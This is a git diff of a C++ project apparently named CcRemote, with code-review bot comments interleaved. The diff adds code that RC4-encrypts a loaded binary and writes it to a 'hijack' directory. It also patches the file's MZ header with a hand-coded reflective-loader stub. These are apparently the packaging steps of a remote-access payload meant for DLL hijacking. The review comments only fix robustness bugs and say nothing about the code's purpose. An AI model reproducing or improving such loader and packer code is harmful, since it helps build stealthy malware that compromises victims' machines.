+Debug|Win32|F:\myapp\CcRemote\strCodeTest\|
diff --git a/strCodeTest/strCodeTest/aaa.txt b/strCodeTest/strCodeTest/aaa.txt
new file mode 100644
index 0000000..2165521
Binary files /dev/null and b/strCodeTest/strCodeTest/aaa.txt differ
diff --git a/strCodeTest/strCodeTest/strCodeTest.cpp b/strCodeTest/strCodeTest/strCodeTest.cpp
index a645a5e..1b9a4f3 100644
--- a/strCodeTest/strCodeTest/strCodeTest.cpp
+++ b/strCodeTest/strCodeTest/strCodeTest.cpp
@@ -8,6 +8,26 @@
 #define SIZE 256
+
+
+bool CreateMyFile(const char* strFilePath, unsigned char *lpBuffer, size_t dwSize)
+{
+ DWORD dwWritten;
+
+ HANDLE hFile = CreateFile(strFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
+ if (hFile != NULL)
+ {
+ WriteFile(hFile, (LPCVOID)lpBuffer, dwSize, &dwWritten, NULL);
+ }
+ else
+ {
+ return false;
+ }
+ CloseHandle(hFile);
+ return true;
+}
+
+
 char* crycode(char* str) {
 printf("cry: %s \n", str);
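Review bot: `CreateFile` reports failure with `INVALID_HANDLE_VALUE`, not `NULL`, so `if (hFile != NULL)` is true on failure, the `else` branch is unreachable, and `WriteFile` and `CloseHandle` are called on an invalid handle; the test should be `if (hFile == INVALID_HANDLE_VALUE) return false;`. `WriteFile`'s return and `dwWritten` are never compared with `dwSize`, so a short or failed write still yields `true`, and `dwSize` (`size_t`) is silently narrowed to `DWORD` at the call. `BOOL ok = WriteFile(hFile, lpBuffer, (DWORD)dwSize, &dwWritten, NULL); CloseHandle(hFile); return ok && dwWritten == dwSize;` closes both gaps.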
@@ -165,18 +185,58 @@ int RC4Test()
 //加密后EncryptTable会变成ChcekTable,由于加密解密使用的Key一样,因此解密时判断CheckTable一致即可
 memcpy(ChcekTable, EncryptTable, 0x100);
 EncryptFunc(buffer, EncryptTable, result);
+
+
+
+ unsigned char * buffers = (unsigned char*)malloc(sizeof(char)*result + SIZE + SIZE);
+
+ memcpy(buffers,ChcekTable,SIZE);
+
+ memcpy(buffers + SIZE,EncryptTable,SIZE);
+
+ memcpy(buffers +SIZE + SIZE,buffer,result);
+
+ CreateMyFile(".\\..\\..\\bin\\hijack\\Cc28256.dat", buffers, result + SIZE + SIZE);
+
 //解密
 EncryptFunc(buffer, ChcekTable, result);
+
+ free(buffers);
-
+ free(buffer);
+
 return 0;
 }
+
+bool ChangeAsmJmpExp()
+{
+ // .10000000: 4D dec ebp
+ // .10000001: 5A pop edx
+ // .10000002: E800000000 call .010000007 --↓1
+ // .10000007: 5B 1pop ebx
+ // .10000008: 52 push edx
+ // .10000009: 45 inc ebp
+ // .1000000A: 55 push ebp
+ // .1000000B: 8BEC mov ebp,esp
+ // .1000000D: 81C3F9AA0000 add ebx,00000AA29 ; 导出函数的偏移
+ // .10000013: FFD3 call ebx
+ // .10000015: C9 leave
+ // .10000016: C3 retn ;
+ char HardCode[] = {0x4D,0x5A,0xE8,0x00,0x00,0x00,0x00,0x5B,0x52,0x45,0x55,0x8B,0xEC,0x81,0xC3,0x29,0xAA,0x00,0x00,0xFF,0xD3,0xC9,0xC3};
+ int CodeLen = 0x15;
+ memcpy(buffer,HardCode,CodeLen);
+ return true;
+}
+
+
 int main()
 {
 InitEncryptTable();
 if (LoaderFile())
 {
+ ChangeAsmJmpExp();
 RC4Test();
+
 }
 char a[] = "kernel32";
diff --git a/strCodeTest/strCodeTest/strCodeTest.vcxproj b/strCodeTest/strCodeTest/strCodeTest.vcxproj
index 607963c..3f8b944 100644
--- a/strCodeTest/strCodeTest/strCodeTest.vcxproj
+++ b/strCodeTest/strCodeTest/strCodeTest.vcxproj
@@ -30,14 +30,14 @@
 Application
 true
 v141
- Unicode
+ MultiByte
 Application
 false
 v141
 true
- Unicode
+ MultiByte
 Application
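Review bot: `buffers` returned by `malloc` in `RC4Test` is passed straight to `memcpy` with no NULL check, and the `bool` from `CreateMyFile` is discarded, so a failed write of `Cc28256.dat` goes unnoticed while the function still returns 0; test the result, `if (!CreateMyFile(...)) { free(buffers); return 1; }`, so the caller learns the output file is missing. `ChangeAsmJmpExp` writes `CodeLen` bytes into the global `buffer` (declared outside this hunk) without checking that the loaded length `result` is at least `CodeLen`, and its `return true` is unconditional and ignored by `main`; a `if (result < (size_t)CodeLen) return false;` guard and a checked call in `main` would make the failure visible. `RC4Test` begins outside the hunk.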